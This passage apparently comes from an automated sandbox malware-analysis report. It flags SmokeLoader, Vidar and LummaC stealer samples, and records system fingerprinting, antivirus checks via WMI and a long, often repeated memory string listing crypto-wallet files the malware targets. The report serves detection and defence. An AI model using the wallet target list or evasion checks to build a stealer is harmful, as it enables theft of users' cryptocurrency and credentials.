Source: explorer.exe, 00000001.00000000.1691692747.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6D07AE71 cpuid

9_2_6D07AE71

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6D07A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

9_2_6D07A8DC

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Code function: 9_2_6CFC8390 NSS_GetVersion,

9_2_6CFC8390

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\F441.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected CryptOne packer

Source: Yara match

File source: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kat796E.tmp PID: 6620, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: F441.exe, 00000006.00000003.2416372141.00000000005C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi 